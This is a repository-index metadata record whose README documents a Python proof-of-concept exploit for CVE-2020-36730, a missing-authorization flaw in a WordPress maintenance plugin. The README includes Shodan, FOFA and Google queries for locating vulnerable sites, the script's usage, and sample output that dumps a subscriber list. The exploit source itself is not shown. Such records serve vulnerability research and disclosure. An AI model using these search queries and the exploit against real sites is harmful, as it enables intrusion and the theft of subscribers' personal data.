{"id":21125715,"url":"https://github.com/randomrobbiebf/cve-2020-36730","last_synced_at":"2025-03-14T11:41:29.061Z","repository":{"id":224075311,"uuid":"762344527","full_name":"RandomRobbieBF/CVE-2020-36730","owner":"RandomRobbieBF","description":"CMP - Coming Soon \u0026 Maintenance \u003c 3.8.2 - Improper Access Controls on AJAX Calls (Subscriber+)","archived":false,"fork":false,"pushed_at":"2024-02-23T15:35:02.000Z","size":6,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-21T05:41:43.446Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2024-02-23T15:29:41.000Z","updated_at":"2024-07-11T16:38:47.000Z","dependencies_parsed_at":"2024-02-23T16:41:25.678Z","dependency_job_id":"146a4cb1-1cf3-4a31-acdc-708e4ae98add","html_url":"https://github.com/RandomRobbieBF/CVE-2020-36730","commit_stats":null,"previous_names":["randomrobbiebf/cve-2020-36730"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2020-36730","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2020-36730/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2020-36730/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2020-36730/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2020-36730/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243573166,"owners_count":20312879,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:31.368Z","updated_at":"2025-03-14T11:41:29.004Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2020-36730\nCMP - Coming Soon \u0026amp; Maintenance \u0026lt; 3.8.2 - Improper Access Controls on AJAX Calls (Subscriber+)\n\n\n# Description:\nSome of the AJAX calls from the plugin do not properly check for capabilities and CSRF tokens, leading to issues such as arbitrary post read, subscribers list export and plugin deactivation.\n\n\n```\nreference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f1ef067b-e4b4-4174-b6ff-ec94a7afd55d?source=api-prod\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n    cvss-score: 8.3\n    cve-id: CVE-2020-36730\n  metadata:\n    fofa-query: \"wp-content/plugins/cmp-coming-soon-maintenance/\"\n    google-query: inurl:\"/wp-content/plugins/cmp-coming-soon-maintenance/\"\n    shodan-query: 'vuln:CVE-2020-36730'\n```\n\n\nHow to use\n---\n\n```\nusage: CVE-2020-36730.py [-h] -u URL [-un USERNAME] [-p PASSWORD]\n\nCMP - Coming Soon \u0026 Maintenance \u003c 3.8.2 - Improper Access Controls on AJAX Calls (Subscriber+) Description: Some of the AJAX calls from the plugin do not properly check for capabilities and CSRF tokens, leading to issues such as arbitrary post read, subscribers list export and plugin deactivation. CVE-2020-36730\n\noptions:\n  -h, --help            show this help message and exit\n  -u URL, --url URL     Website URL\n  -un USERNAME, --username USERNAME\n                        WordPress username\n  -p PASSWORD, --password PASSWORD\n                        WordPress password\n```\n\n\nPOC\n---\n```\n$ python3 CVE-2020-36730.py -u http://wordpress.lan -un user -p useruser1\nThe plugin version is below 3.8.2.\nThe plugin version is 3.7.6\nVulnerability check: http://wordpress.lan\nLogged in successfully.\n\n\n\nID,Date,Email,Firstname,Lastname,Fullname\n0,\"2024-02-23 15:08:15\",test@test.com,,,\n```\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2020-36730","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2020-36730","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2020-36730/lists"}